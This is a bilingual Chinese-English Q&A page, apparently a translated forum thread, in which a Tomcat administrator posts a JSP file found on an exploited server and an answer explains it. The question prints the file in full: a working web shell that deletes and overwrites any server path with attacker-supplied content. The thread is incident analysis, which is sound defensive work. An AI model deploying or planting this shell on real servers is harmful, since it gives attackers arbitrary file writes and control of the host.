这段代码在做什么 [英] what is this code doing
问题描述
我有一个最近被利用的Web应用程序.服务器是tomcat 7.0.42.我在服务器上找到没有上传的文件.你知道为什么会出现吗?在这里,我向您展示这些文件之一的内容,有人可以告诉我它试图做什么吗?
I have a web application which has been recently exploited. The server is tomcat 7.0.42 . I have found files on server which I havent upload. Do you know why are they appearing? Here I show you the contents of one of these files, can anybody tell me what is it trying to do?
<%@ page language="java" pageEncoding="gbk"%>
<jsp:directive.page import="java.io.File"/>
<jsp:directive.page import="java.io.OutputStream"/>
<jsp:directive.page import="java.io.FileOutputStream"/>
<% int i=0; String method=request.getParameter("act"); if(method!=null && method.equals("yoco")) {
String url=request.getParameter("url");
String text=request.getParameter("smart");
File f=new File(url);
if(f.exists()) {
f.delete();
}
try{
OutputStream o=new FileOutputStream(f);
o.write(text.getBytes());
o.close();
} catch (Exception e) {
i++;
%>0<%
}
}
if(i==0){
%>1<%
}%>
<form action='?act=yoco' method='post'>
<input size="100" value="<%=application.getRealPath("/") %>" name="url">
<br>
<textarea rows="20" cols="80" name="smart">
推荐答案
这看起来像是为攻击者提供远程控制的rootkit. 他们正在向相同的JSP Servlet进行表单发布.收到发布请求后,将保留并处理通过POST请求发送给它的参数值;
This looks like a rootkit providing remote control for attackers. They are making a form post to the same JSP servlet. When the post request is received parameter values sent to it via the POST request is held and processed;
String url=request.getParameter("url");
String text=request.getParameter("smart");
注意,通过参数url
接收的值保存在变量url
中.然后,他们检查以确保参数值确实存在于文件中,然后再删除-使用;
Notice the value received via parameter url
is held in a variable url
. They then check to make sure the parameter value, does exist as a file before deleting it - using;
File f=new File(url);
if(f.exists()) {
f.delete();
}
最后,第二个参数smart
保留在参数text
中.然后将其用作使用参数url
作为文件路径创建的新文件的内容.
Finally the second parameter smart
is held in parameter text
. This is then used as the content of a new file created using parameter url
as the file path.
OutputStream o=new FileOutputStream(f);
o.write(text.getBytes());
o.close();
这篇关于这段代码在做什么的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!